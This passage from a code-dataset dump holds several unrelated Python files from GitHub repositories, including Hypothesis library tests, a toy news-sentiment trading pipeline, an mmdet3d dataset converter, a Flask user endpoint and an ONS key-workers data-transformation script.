0\n\nread_path = \"Data/human_records/full_records_wav/\"\n\nfor file in os.listdir(read_path):\n rate, data = wavfile.read(read_path + file)\n seconds += len(data)/rate\n\nprint(\"Homan records Data length is: {} minutes\".format(seconds/60))","repo_name":"AlonBarak-dev/Speech_Detection_With_UAV","sub_path":"count_minutes_records.py","file_name":"count_minutes_records.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14141642822","text":"from __future__ import division, print_function, absolute_import, \\\n unicode_literals\n\nimport math\n\nimport pytest\nimport hypothesis.strategies as ds\nfrom hypothesis import Settings, find, given\nfrom hypothesis.errors import InvalidArgument\nfrom tests.common.basic import Bitfields, BoringBitfields\n\n\ndef fn_test(*fnkwargs):\n fnkwargs = list(fnkwargs)\n return pytest.mark.parametrize(\n ('fn', 'args'), fnkwargs,\n ids=[\n '%s(%s)' % (fn.__name__, ', '.join(map(repr, args)))\n for fn, args in fnkwargs\n ]\n )\n\n\ndef fn_ktest(*fnkwargs):\n fnkwargs = list(fnkwargs)\n return pytest.mark.parametrize(\n ('fn', 'kwargs'), fnkwargs,\n ids=[\n '%s(%s)' % (fn.__name__, ', '.join(\n '%s=%r' % (k, v)\n for k, v in kwargs.items()\n ),)\n for fn, kwargs in fnkwargs\n ]\n )\n\n\n@fn_ktest(\n (ds.integers, {'min_value': float('nan')}),\n (ds.integers, {'min_value': 2, 'max_value': 1}),\n (ds.sampled_from, {'elements': ()}),\n (ds.lists, {}),\n (ds.lists, {'average_size': float('nan')}),\n (ds.lists, {'min_size': 10, 'max_size': 9}),\n (ds.lists, {'min_size': -10, 'max_size': -9}),\n (ds.lists, {'max_size': -9}),\n (ds.lists, {'max_size': 10}),\n (ds.lists, {'min_size': -10}),\n (ds.lists, {'max_size': 10, 'average_size': 20}),\n (ds.lists, {'min_size': 1.0, 'average_size': 0.5}),\n (ds.lists, {'elements': 'hi'}),\n (ds.text, {'min_size': 10, 'max_size': 9}),\n (ds.text, {'max_size': 10, 'average_size': 20}),\n (ds.binary, 
{'min_size': 10, 'max_size': 9}),\n (ds.binary, {'max_size': 10, 'average_size': 20}),\n (ds.floats, {'min_value': float('nan')}),\n (ds.floats, {'max_value': 0.0, 'min_value': 1.0}),\n (ds.fixed_dictionaries, {'mapping': 'fish'}),\n (ds.fixed_dictionaries, {'mapping': {1: 'fish'}}),\n (ds.dictionaries, {'keys': ds.integers(), 'values': 1}),\n (ds.dictionaries, {'keys': 1, 'values': ds.integers()}),\n (ds.text, {'alphabet': '', 'min_size': 1}),\n)\ndef test_validates_keyword_arguments(fn, kwargs):\n with pytest.raises(InvalidArgument):\n fn(**kwargs)\n\n\n@fn_ktest(\n (ds.integers, {'min_value': 0}),\n (ds.integers, {'min_value': 11}),\n (ds.integers, {'min_value': 11, 'max_value': 100}),\n (ds.integers, {'max_value': 0}),\n (ds.lists, {'max_size': 0}),\n (ds.lists, {'elements': ds.integers()}),\n (ds.lists, {'elements': ds.integers(), 'max_size': 5}),\n (ds.lists, {'elements': ds.booleans(), 'min_size': 5}),\n (ds.lists, {'elements': ds.booleans(), 'min_size': 5, 'max_size': 10}),\n (ds.lists, {\n 'average_size': 20, 'elements': ds.booleans(), 'max_size': 25}),\n (ds.sets, {\n 'min_size': 10, 'max_size': 10, 'elements': ds.integers(),\n }),\n (ds.booleans, {}),\n (ds.just, {'value': 'hi'}),\n (ds.integers, {'min_value': 12, 'max_value': 12}),\n (ds.floats, {}),\n (ds.floats, {'min_value': 1.0}),\n (ds.floats, {'max_value': 1.0}),\n (ds.floats, {'max_value': 1.0, 'min_value': -1.0}),\n (ds.sampled_from, {'elements': [1]}),\n (ds.sampled_from, {'elements': [1, 2, 3]}),\n (ds.fixed_dictionaries, {'mapping': {1: ds.integers()}}),\n (ds.dictionaries, {'keys': ds.booleans(), 'values': ds.integers()}),\n (ds.text, {'alphabet': 'abc'}),\n (ds.text, {'alphabet': ''}),\n (ds.text, {'alphabet': ds.sampled_from('abc')}),\n)\ndef test_produces_valid_examples_from_keyword(fn, kwargs):\n fn(**kwargs).example()\n\n\n@fn_test(\n (ds.one_of, (1,))\n)\ndef test_validates_args(fn, args):\n with pytest.raises(InvalidArgument):\n fn(*args)\n\n\n@fn_test(\n (ds.one_of, (ds.booleans(), 
ds.tuples(ds.booleans()))),\n (ds.one_of, (ds.booleans(),)),\n (ds.text, ()),\n (ds.binary, ()),\n (ds.builds, (lambda x, y: x + y, ds.integers(), ds.integers())),\n)\ndef test_produces_valid_examples_from_args(fn, args):\n fn(*args).example()\n\n\ndef test_tuples_raise_error_on_bad_kwargs():\n with pytest.raises(TypeError):\n ds.tuples(stuff='things')\n\n\ndef test_streaming_streams():\n for v in ds.streaming(ds.integers(max_value=1000)).example()[:10]:\n assert v <= 1000\n\n\n@given(ds.lists(ds.booleans(), min_size=10, max_size=10))\ndef test_has_specified_length(xs):\n assert len(xs) == 10\n\n\n@given(ds.integers(max_value=100), settings=Settings(max_examples=100))\ndef test_has_upper_bound(x):\n assert x <= 100\n\n\n@given(ds.integers(min_value=100))\ndef test_has_lower_bound(x):\n assert x >= 100\n\n\n@given(ds.integers(min_value=1, max_value=2))\ndef test_is_in_bounds(x):\n assert 1 <= x <= 2\n\n\ndef test_float_can_find_max_value_inf():\n assert find(\n ds.floats(max_value=float('inf')), lambda x: math.isinf(x)\n ) == float('inf')\n assert find(\n ds.floats(min_value=0.0), lambda x: math.isinf(x)) == float('inf')\n\n\ndef test_float_can_find_min_value_inf():\n find(ds.floats(), lambda x: x < 0 and math.isinf(x))\n find(\n ds.floats(min_value=float('-inf'), max_value=0.0),\n lambda x: math.isinf(x))\n\n\ndef test_can_use_basic_strategies():\n assert find(ds.basic(Bitfields), lambda x: True) == 0\n assert find(ds.basic(Bitfields()), lambda x: True) == 0\n assert find(ds.basic(BoringBitfields), lambda x: True) != 0\n\n\ndef test_can_use_basic_strategies_with_only_kwargs():\n assert find(\n ds.basic(generate=BoringBitfields().generate), lambda x: True) != 0\n\n\ndef test_can_override_simplify_in_basic_strategies():\n assert find(\n ds.basic(BoringBitfields, simplify=Bitfields().simplify),\n lambda x: True) == 0\n\n\ndef test_can_find_none_list():\n assert find(ds.lists(ds.none()), lambda x: len(x) >= 3) == [None] * 3\n\n\ndef test_fractions():\n assert 
find(ds.fractions(), lambda f: f >= 1) == 1\n\n\ndef test_decimals():\n assert find(ds.decimals(), lambda f: f.is_finite() and f >= 1) == 1\n\n\ndef test_non_float_decimal():\n find(ds.decimals(), lambda d: ds.float_to_decimal(float(d)) != d)\n\n\ndef test_validates_min_size_for_sets():\n ds.sets(ds.booleans(), min_size=2)\n with pytest.raises(InvalidArgument):\n ds.sets(ds.booleans(), min_size=3)\n\n\ndef test_produces_dictionaries_of_at_least_minimum_size():\n t = find(\n ds.dictionaries(ds.booleans(), ds.integers(), min_size=2),\n lambda x: True)\n assert t == {False: 0, True: 0}\n\n\n@given(\n ds.dictionaries(ds.integers(), ds.integers(), max_size=5),\n settings=Settings(max_examples=50))\ndef test_dictionaries_respect_size(d):\n assert len(d) <= 5\n\n\n@given(\n ds.dictionaries(ds.integers(), ds.integers(), max_size=0),\n settings=Settings(max_examples=50))\ndef test_dictionaries_respect_zero_size(d):\n assert len(d) <= 5\n\n\n@given(\n ds.lists(ds.none(), max_size=5)\n)\ndef test_none_lists_respect_max_size(ls):\n assert len(ls) <= 5\n\n\n@given(\n ds.lists(ds.none(), max_size=5, min_size=1)\n)\ndef test_none_lists_respect_max_and_min_size(ls):\n assert 1 <= len(ls) <= 5\n","repo_name":"graydon/hypothesis","sub_path":"tests/cover/test_direct_strategies.py","file_name":"test_direct_strategies.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"901944161","text":"import requests\nimport string\nfrom collections import Counter\n\nclass Scraper:\n\n def fetch_news(self, urls):\n article_contents = []\n for url in urls:\n try:\n contents = requests.get(url).text\n article_contents.append(contents)\n except Exception as e:\n print(e)\n return article_contents\n\ndef is_clean(word):\n blacklist = {\"var\", \"img\", \"e\", \"void\"}\n if not word:\n return False\n if word in blacklist:\n return False\n for i, letter in enumerate(word):\n if i > 0 and letter in 
string.ascii_uppercase:\n return False\n if letter not in string.ascii_letters:\n return False\n return True\n\nclass Cleaner:\n\n def clean_articles(self, articles):\n clean_articles = []\n\n for article in articles:\n clean_words = []\n try:\n for word in article.split(\" \"):\n if is_clean(word):\n clean_words.append(word)\n except Exception as e:\n print(e)\n clean_articles.append(' '.join(clean_words))\n return clean_articles\n\n\nclass Deduplicator:\n\n def deduplicate_articles(self, articles):\n seen_articles = set()\n deduplicated_articles = []\n for article in articles:\n if hash(article) in seen_articles:\n continue\n else:\n seen_articles.add(hash(article))\n deduplicated_articles.append(article)\n\n return deduplicated_articles\n\n\nclass Analyzer:\n good_words = {\"unveiled\", \"available\", \"faster\", \"stable\"}\n bad_words = {\"sued\", \"defiance\", \"violation\"}\n\n def extract_entities_and_sentiment(self, articles):\n entity_score_pairs = []\n for article in articles:\n score = 0\n entities = []\n for word in article.split(\" \"):\n if word[0] == word[0].upper():\n entities.append(word)\n if word.lower() in self.good_words:\n score += 1\n elif word.lower() in self.bad_words:\n score -= 1\n main_entities = [i[0] for i in Counter(entities).most_common(2)]\n entity_score_pair = (main_entities, score)\n entity_score_pairs.append(entity_score_pair)\n return entity_score_pairs\n\nclass DecisionMaker:\n target_companies = set(['Apple', 'Uber', 'Google'])\n\n def make_decisions(self, entity_score_pairs):\n decisions = []\n for entities, score in entity_score_pairs:\n for entity in entities:\n if entity in self.target_companies:\n quantity = abs(score)\n order = \"Buy\" if score > 0 else \"Sell\"\n decision = (order, quantity, entity)\n decisions.append(decision)\n return decisions\n\ndef test_scraper():\n scraper = Scraper()\n assert scraper.fetch_news([\"https://asdfsdfsfsdkklzhfgarefsdfsfasdfasdf2232323f.com\"]) == []\n assert 
len(scraper.fetch_news([\"https://google.com\", \"https://amazon.com\"])) == 2\n\ndef test_is_clean():\n print(is_clean(\"\"))\n assert not is_clean(\"\")\n assert not is_clean(\"{}34\")\n assert not is_clean(\"snakeCase\")\n assert is_clean(\"word\")\n\n\ndef test_cleaner():\n cleaner = Cleaner()\n article = \"this is anArticle test\"\n assert cleaner.clean_articles([article])[0] == \"this is test\"\n\n\ndef test_dedup():\n dedup = Deduplicator()\n articles = [\"one\", \"one\", \"two\"]\n assert dedup.deduplicate_articles(articles) == [\"one\", \"two\"]\n\ndef test_analzer():\n analyzer = Analyzer()\n articles = [\"Uber unveiled self driving car\"]\n\n assert analyzer.extract_entities_and_sentiment(articles) == [(['Uber'], 1)]\n\n\n","repo_name":"PacktWorkshops/The-Artificial-Intelligence-Infrastructure-Workshop","sub_path":"Chapter08/tests/ex01_test.py","file_name":"ex01_test.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"33"} +{"seq_id":"36549617024","text":"import argparse\nfrom os import path as osp\n\nfrom dataset_converters import nuscenes_converter as nuscenes_converter\nfrom dataset_converters import semantickitti_converter\nfrom dataset_converters.update_infos_to_v2 import update_pkl_infos\n\ndef nuscenes_data_prep(root_path,\n info_prefix,\n version,\n dataset_name,\n out_dir,\n max_sweeps=10):\n \"\"\"Prepare data related to nuScenes dataset.\n\n Related data consists of '.pkl' files recording basic infos,\n 2D annotations and groundtruth database.\n\n Args:\n root_path (str): Path of dataset root.\n info_prefix (str): The prefix of info filenames.\n version (str): Dataset version.\n dataset_name (str): The dataset class name.\n out_dir (str): Output directory of the groundtruth database info.\n max_sweeps (int, optional): Number of input consecutive frames.\n Default: 10\n \"\"\"\n nuscenes_converter.create_nuscenes_infos(\n root_path, info_prefix, 
version=version, max_sweeps=max_sweeps)\n\n if version == 'v1.0-test':\n info_test_path = osp.join(out_dir, f'{info_prefix}_infos_test.pkl')\n update_pkl_infos('nuscenes', out_dir=out_dir, pkl_path=info_test_path)\n return\n\n info_train_path = osp.join(out_dir, f'{info_prefix}_infos_train.pkl')\n info_val_path = osp.join(out_dir, f'{info_prefix}_infos_val.pkl')\n update_pkl_infos('nuscenes', out_dir=out_dir, pkl_path=info_train_path)\n update_pkl_infos('nuscenes', out_dir=out_dir, pkl_path=info_val_path)\n\ndef semantickitti_data_prep(info_prefix, out_dir):\n \"\"\"Prepare the info file for SemanticKITTI dataset.\n\n Args:\n info_prefix (str): The prefix of info filenames.\n out_dir (str): Output directory of the generated info file.\n \"\"\"\n semantickitti_converter.create_semantickitti_info_file(\n info_prefix, out_dir)\n\n\nparser = argparse.ArgumentParser(description='Data converter arg parser')\nparser.add_argument('dataset', metavar='kitti', help='name of the dataset')\nparser.add_argument(\n '--root-path',\n type=str,\n default='./data/kitti',\n help='specify the root path of dataset')\nparser.add_argument(\n '--version',\n type=str,\n default='v1.0',\n required=False,\n help='specify the dataset version, no need for kitti')\nparser.add_argument(\n '--max-sweeps',\n type=int,\n default=10,\n required=False,\n help='specify sweeps of lidar per example')\nparser.add_argument(\n '--with-plane',\n action='store_true',\n help='Whether to use plane information for kitti.')\nparser.add_argument(\n '--out-dir',\n type=str,\n default='./data/kitti',\n required=False,\n help='name of info pkl')\nparser.add_argument('--extra-tag', type=str, default='kitti')\nparser.add_argument(\n '--workers', type=int, default=4, help='number of threads to be used')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n from mmdet3d.utils import register_all_modules\n register_all_modules()\n\n if args.dataset == 'nuscenes' and args.version != 'v1.0-mini':\n train_version = 
f'{args.version}-trainval'\n nuscenes_data_prep(\n root_path=args.root_path,\n info_prefix=args.extra_tag,\n version=train_version,\n dataset_name='NuScenesDataset',\n out_dir=args.out_dir,\n max_sweeps=args.max_sweeps)\n test_version = f'{args.version}-test'\n nuscenes_data_prep(\n root_path=args.root_path,\n info_prefix=args.extra_tag,\n version=test_version,\n dataset_name='NuScenesDataset',\n out_dir=args.out_dir,\n max_sweeps=args.max_sweeps)\n elif args.dataset == 'nuscenes' and args.version == 'v1.0-mini':\n train_version = f'{args.version}'\n nuscenes_data_prep(\n root_path=args.root_path,\n info_prefix=args.extra_tag,\n version=train_version,\n dataset_name='NuScenesDataset',\n out_dir=args.out_dir,\n max_sweeps=args.max_sweeps)\n elif args.dataset == 'semantickitti':\n semantickitti_data_prep(\n info_prefix=args.extra_tag, out_dir=args.out_dir)\n else:\n raise NotImplementedError(f'Don\\'t support {args.dataset} dataset.')\n","repo_name":"SmartBot-PJLab/P3Former","sub_path":"tools/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"33"} +{"seq_id":"73110613853","text":"import json\nimport numpy as np\n\n\ndef task(ranking_str_1: str, ranking_str_2: str) -> str:\n try:\n ranking1 = json.loads(ranking_str_1)\n ranking2 = json.loads(ranking_str_2)\n except json.decoder.JSONDecodeError:\n print(\"Входные данные функции task5 должны быть json-строками\")\n exit(1)\n\n y_a = _get_relationship_matrix(ranking1)\n y_a_t = y_a.transpose()\n\n y_b = _get_relationship_matrix(ranking2)\n y_b_t = y_b.transpose()\n\n y_a_b = np.multiply(y_a, y_b)\n y_a_b_t = np.multiply(y_a_t, y_b_t)\n\n conflicts = []\n for i in range(y_a_b.shape[0]):\n for j in range(y_a_b.shape[1]):\n if y_a_b[i, j] == 0 and y_a_b_t[i, j] == 0:\n if (str(j + 1), str(i + 1)) not in conflicts:\n conflicts.append((str(i + 1), str(j + 1)))\n return 
json.dumps(conflicts)\n\n\ndef _get_relationship_matrix(ranking):\n ranks = dict()\n rank_len = _get_ranking_length(ranking)\n for i, rank in enumerate(ranking):\n if type(rank) is str:\n ranks[int(rank)] = i\n else:\n for r in rank:\n ranks[int(r)] = i\n\n return np.matrix([[1 if ranks[i + 1] <= ranks[j + 1] else 0 for j in range(rank_len)] for i in range(rank_len)],\n dtype=np.uint8)\n\n\ndef _get_ranking_length(ranking):\n length = 0\n for i in ranking:\n if type(i) is str:\n length += 1\n else:\n length += len(i)\n return length\n\n\ndef main():\n res = task('[\"1\", [\"2\",\"3\"],\"4\", [\"5\", \"6\", \"7\"], \"8\", \"9\", \"10\"]', '[[\"1\",\"2\"], [\"3\",\"4\",\"5\"], \"6\", \"7\", \"9\", [\"8\",\"10\"]]')\n print(f\"Ответ: {res}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DarkArtheme/system-analysis","sub_path":"task5/task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22572681088","text":"from flask import Blueprint, make_response, jsonify,request\nfrom app.models.model import Users\n\nuser_blueprint = Blueprint('user', __name__)\n@user_blueprint.route('/user', methods=['GET'])\ndef user_profile():\n username = request.json['username']\n user = Users.objects.get(username=username)\n return make_response(jsonify({\n 'name': user.name,\n 'email': user.email,\n 'dob': user.dob\n }), 200)\n\n\n@user_blueprint.route('/getalluser', methods=['GET'])\ndef get_alluser():\n user = Users.objects.all()\n\n output = []\n for a in user:\n output.append({\n 'username':a.username,\n 'name':a.name,\n 'email':a.email,\n 'dob':a.dob\n })\n return jsonify({'user': output})\n","repo_name":"pravinMohadikar/flask-POC","sub_path":"app/services/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} 
+{"seq_id":"5607268126","text":"import sys\n\nfile1=open(sys.argv[1],'r')\nnum_dict={}\nnum_list=[]\nsyn_dict={}\nfor line in file1:\n line_list=line.strip().split('\\t')\n if int(line_list[-1])>int(line_list[-2]):\n num_list.append(int(line_list[-1]))\n else:\n num_list.append(int(line_list[-2]))\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nplt.hist(num_list)\n# sns.distplot(num_list,norm_hist=False,kde=False)\nplt.savefig('xx.png')","repo_name":"zhanglingkui/mSynOrths","sub_path":"bin/cal_flanking_num.py","file_name":"cal_flanking_num.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"24245511386","text":"import json\nfrom IPython import display\n\nfrom typing import Any, Dict, List, Text, Union\n\n\ndef render_component(\n component_name: Text,\n data: Union[List[Dict[Text, Union[Dict[Text, Any], Text]]],\n Dict[Text, List[Union[Text, float, List[float]]]]],\n config: Dict[Text, Union[Dict[Text, Dict[Text, Text]], Text, bool]]\n) -> None:\n \"\"\"Renders the specified component in Colab.\n\n Colab requires custom visualization to be rendered in a sandbox so we cannot\n use Jupyter widget.\n\n Args:\n component_name: The name of the component to render.\n data: A dictionary containing data for visualization.\n config: A dictionary containing the configuration.\n \"\"\"\n display.display(\n display.HTML(\"\"\"\n \n <{component_name} id=\"component\">\n \n \"\"\".format(\n component_name=component_name,\n config=json.dumps(config),\n data=json.dumps(data))))\n","repo_name":"yupbank/model-analysis","sub_path":"tensorflow_model_analysis/notebook/colab/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"70237186336","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# # ONS Key workers reference tables \n\nfrom gssutils 
import * \nimport json\nimport string\nimport warnings\nimport pandas as pd\nimport json\nimport re\n\ndef left(s, amount):\n return s[:amount]\n\ndef right(s, amount):\n return s[-amount:]\n\ndef mid(s, offset, amount):\n return s[offset:offset+amount]\n\ndef cellLoc(cell):\n return right(str(cell), len(str(cell)) - 2).split(\" \", 1)[0]\n\ndef cellCont(cell):\n return re.findall(r\"'([^']*)'\", cell)[0]\n\ndef col2num(col):\n num = 0\n for c in col:\n if c in string.ascii_letters:\n num = num * 26 + (ord(c.upper()) - ord('A')) + 1\n return num\n\ndef colnum_string(n):\n string = \"\"\n while n > 0:\n n, remainder = divmod(n - 1, 26)\n string = chr(65 + remainder) + string\n return string\n\ndef excelRange(bag):\n xvalues = []\n yvalues = []\n for cell in bag:\n coordinate = cellLoc(cell)\n xvalues.append(''.join([i for i in coordinate if not i.isdigit()]))\n yvalues.append(int(''.join([i for i in coordinate if i.isdigit()])))\n high = 0\n low = 0\n for i in xvalues:\n if col2num(i) >= high:\n high = col2num(i)\n if low == 0:\n low = col2num(i)\n elif col2num(i) < low:\n low = col2num(i)\n highx = colnum_string(high)\n lowx = colnum_string(low)\n highy = str(max(yvalues))\n lowy = str(min(yvalues))\n\n return '{' + lowx + lowy + '-' + highx + highy + '}'\n\ndef decimal(s):\n try:\n float(s)\n if float(s) >= 1:\n return True\n else:\n return False\n except ValueError:\n return False\n\ninfo = json.load(open('info.json')) \nlandingPage = info['landingPage'] \nlandingPage \n\n\n# In[2]:\n\n\nscraper = Scraper(landingPage) \nscraper\n\n\n# In[3]:\n\n\ndistribution = scraper.distributions[0]\ndisplay(distribution)\n\n\n# In[4]:\n\n\ntrace = TransformTrace()\n\ntabs = { tab: tab for tab in distribution.as_databaker() }\n\ntidied_sheets = []\n\ndatasetTitle = 'ONS Key Workers Reference Tables'\nlink = distribution.downloadURL\n\nwith open('info.json') as info:\n data = info.read()\n\ninfoData = json.loads(data)\n\ninfoData['transform']['transformStage'] = {}\n\nfor tab 
in tabs:\n\n if not tab.name.lower() in ['contents', 'notes', 'var dfn', 'table 13', 'table 15']:#ignore tab 13/15 get it checked\n\n columns = ['Period', 'ONS Geography Code', 'Workforce Category', 'Workforce Breakdown', 'Measure Type', 'Unit']\n trace.start(datasetTitle, tab, columns, link)\n\n if right(tab.name.lower(), 2) in [' 8']:\n cell = tab.filter(contains_string('Table ')).shift(0, 4)\n else:\n cell = tab.filter(contains_string('Table ')).shift(0, 5)\n\n if right(tab.name.lower(), 3) in [' 1b', ' 7b', 'e 8', ' 9b', '10b', '11b', '12b', '14b', '16b']:\n remove = tab.filter(contains_string('Source:')).shift(UP).expand(RIGHT).expand(LEFT).expand(DOWN)\n elif right(tab.name.lower(), 7) in ['14b (2)']:\n remove = tab.filter(contains_string('Total')).expand(RIGHT).expand(LEFT).expand(DOWN)\n else:\n remove = tab.filter(contains_string('Source:')).expand(RIGHT).expand(LEFT).expand(DOWN)\n\n pivot = cellLoc(cell)\n\n if right(tab.name.lower(), 2) in [' 8']:\n period = cell.shift(0, -3)\n else:\n period = cell.shift(0, -4)\n\n trace.Period('Period Range for Tab given at cell value: {}', var = cellLoc(period)) \n\n if right(tab.name.lower(), 2) in ['17']:\n region = tab.filter(contains_string('Category')).fill(RIGHT).is_not_blank()\n elif right(tab.name.lower(), 2) in ['18', '19']:\n region = cell.expand(DOWN).is_not_blank() - remove\n else:\n region = 'E92000001'\n\n if isinstance(region, str):\n trace.ONS_Geography_Code('Geo-Code for tab is hard-coded as {}', var = region)\n else:\n trace.ONS_Geography_Code('Values found in range: {}', var = excelRange(region)) \n\n if right(tab.name.lower(), 2) in [' 8']:\n breakdown = 'Has Dependant Child(s)'\n elif right(tab.name.lower(), 2) in ['17', '18', '19']:\n breakdown = 'Key Workers'\n elif right(tab.name.lower(), 3) in [' 1a']:\n breakdown = 'N/A'\n else:\n breakdown = tab.filter(contains_string('Category')).fill(RIGHT).is_not_blank()\n\n if isinstance(breakdown, str):\n trace.Workforce_Breakdown('Workforce Breakdown 
for tab is hard-coded as {}', var = breakdown)\n else:\n trace.Workforce_Breakdown('Values found in range: {}', var = excelRange(breakdown)) \n\n if right(tab.name.lower(), 2) in ['18']:\n category = tab.filter('City Region').fill(RIGHT).is_not_blank()\n elif right(tab.name.lower(), 2) in ['19']:\n category = tab.filter('Local Authority').fill(RIGHT).is_not_blank()\n else:\n category = cell.expand(DOWN).is_not_blank() - remove\n\n trace.Workforce_Category('Values found in range: {}', var = excelRange(category)) \n\n if right(tab.name.lower(), 3) in [' 2a', ' 2b', ' 17']:\n observations = tab.filter('pop.').fill(DOWN).is_not_blank() - remove\n else:\n observations = tab.filter('population').fill(DOWN).is_not_blank() - remove\n\n measureType = 'Count'\n\n unit = 'Person'\n\n trace.Measure_Type('Hardcoded value as: {}', var = measureType)\n\n trace.Unit('Hardcoded value as: {}',var = unit) \n\n if '(' in tab.name:\n title = cellCont(str(tab.filter(contains_string(str(tab.name[:-4])))))\n else:\n title = cellCont(str(tab.filter(contains_string(str(tab.name)))))\n\n columnInfo = {'Period' : trace.Period.var,\n 'ONS Geography Code' : trace.ONS_Geography_Code.var,\n 'Workforce Category' : trace.Workforce_Category.var,\n 'Workforce Breakdown' : trace.Workforce_Breakdown.var,\n 'Measure Type' : trace.Measure_Type.var,\n 'Unit' : trace.Unit.var}\n\n dicti = {'name' : tab.name, \n 'title' : title, \n 'columns' : columnInfo}\n \n infoData['transform']['transformStage'][tab.name] = dicti\n\n with open('infoTest.json', 'w') as info:\n info.write(json.dumps(infoData, indent=4))\n\n if right(tab.name.lower(), 3) in [' 1a', 'e 8']:\n dimensions = [\n HDim(period, 'Period', CLOSEST, ABOVE),\n HDimConst('ONS Geography Code', region),\n HDim(category, 'Workforce Category', DIRECTLY, LEFT),\n HDimConst('Workforce Breakdown', breakdown),\n HDimConst('Tab', tab.name),\n HDimConst('Measure Type', measureType), \n HDimConst('Unit', unit) \n ]\n elif right(tab.name.lower(), 2) in ['17']:\n 
dimensions = [\n HDim(period, 'Period', CLOSEST, ABOVE),\n HDim(region, 'ONS Geography Code', CLOSEST, LEFT),\n HDim(category, 'Workforce Category', DIRECTLY, LEFT),\n HDimConst('Workforce Breakdown', breakdown),\n HDimConst('Tab', tab.name),\n HDimConst('Measure Type', measureType), \n HDimConst('Unit', unit) \n ]\n elif right(tab.name.lower(), 2) in ['18', '19']:\n dimensions = [\n HDim(period, 'Period', CLOSEST, ABOVE),\n HDim(region, 'ONS Geography Code', DIRECTLY, LEFT),\n HDim(category, 'Workforce Category', CLOSEST, LEFT),\n HDimConst('Workforce Breakdown', breakdown),\n HDimConst('Tab', tab.name),\n HDimConst('Measure Type', measureType), \n HDimConst('Unit', unit) \n ]\n else:\n dimensions = [\n HDim(period, 'Period', CLOSEST, ABOVE),\n HDimConst('ONS Geography Code', region),\n HDim(category, 'Workforce Category', DIRECTLY, LEFT),\n HDim(breakdown, 'Workforce Breakdown', CLOSEST, LEFT),\n HDimConst('Tab', tab.name),\n HDimConst('Measure Type', measureType), \n HDimConst('Unit', unit) \n ]\n \n tidy_sheet = ConversionSegment(tab, dimensions, observations)\n trace.with_preview(tidy_sheet)\n\n trace.store(\"keyWorkers\", tidy_sheet.topandas())\n\n else:\n continue\n\n\n# In[5]:\n\n\npd.set_option('display.float_format', lambda x: '%.0f' % x)\n\ndf = trace.combine_and_trace(datasetTitle, \"keyWorkers\").fillna('')\n\ndf = df.reset_index(drop=True)\n\ndf['Period'] = df.apply(lambda x: x['Period'].replace('United Kingdom, ', '') if 'United Kingdom, ' in x['Period'] else x['Period'], axis = 1)\n\ndf = df.replace({'DATAMARKER' : {\n '-' : 'Supressed due to small sample size'}})\n\ndf['Workforce Breakdown'] = df.apply(lambda x: str(x['Workforce Breakdown']) + ' aged under 4' if 'Table 9' in x['Tab'] else x['Workforce Breakdown'], axis = 1)\n\ndf['Workforce Breakdown'] = df.apply(lambda x: str(x['Workforce Breakdown']) + ' aged under 15' if 'Table 10' in x['Tab'] else x['Workforce Breakdown'], axis = 1)\n\ndf['Workforce Breakdown'] = df.apply(lambda x: 'Travel to 
work via ' + str(x['Workforce Breakdown']) if 'Table 14a' in x['Tab'] else x['Workforce Breakdown'], axis = 1)\n\ndf['Workforce Breakdown'] = df.apply(lambda x: 'Travel to work via ' + str(x['Workforce Breakdown']) if 'Table 14b' in x['Tab'] else x['Workforce Breakdown'], axis = 1)\n\ndf = df.drop(['Tab'], axis = 1)\n\ndf = df[['Period', 'ONS Geography Code', 'Workforce Category', 'Workforce Breakdown', 'Measure Type', 'Unit', 'OBS', 'DATAMARKER']]\n\ndf\n\n\n# In[6]:\n\n\nnotes = \"\"\"\nAll counts are individually rounded to the nearest thousand. Totals may not add exactly due to this rounding.\nThe definition of disability used is consistent with the core definition of disability under the Equality Act 2010. A person is considered to be disabled if they self-report a physical or mental health condition or illness lasting or expecting to last 12 months or more which reduces their ability to carry out day-to-day activities.\nRespondents who did not provide disability status have been excluded.\n\"\"\"\n\n\n# In[7]:\n\n\nfrom IPython.core.display import HTML\nfor col in df:\n if col not in ['Value']:\n df[col] = df[col].astype('category')\n display(HTML(f\"

    {col}

    \"))\n display(df[col].cat.categories)\n\n\n# In[8]:\n\n\nfor column in df:\n if column in ('Workforce Breakdown', 'Workforce Category'):\n df[column] = df[column].map(lambda x: pathify(x))\n\n\n# In[9]:\n\n\nout = Path('out')\nout.mkdir(exist_ok=True)\n\ntitle = pathify(datasetTitle)\n\nscraper.dataset.comment = notes\n\nimport os\n\ndf.drop_duplicates().to_csv(out / f'{title}.csv', index = False)\n\nwith open(out / f'{title}.csv-metadata.trig', 'wb') as metadata:\n metadata.write(scraper.generate_trig())\n\ntrace.output()\n\ndf\n\n","repo_name":"GSS-Cogs/family-covid-19","sub_path":"datasets/ONS-Key-workers-population-and-characteristics-2019/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10953142698","text":"import sqlite3\r\nconn = sqlite3.connect('id.db')\r\nimport tkinter as tk\r\nimport ctypes\r\nctypes.windll.user32.ShowWindow( ctypes.windll.kernel32.GetConsoleWindow(), 0 )\r\n\r\n\r\nconn = sqlite3.connect('id.db')\r\nconn.execute(\"CREATE TABLE IF 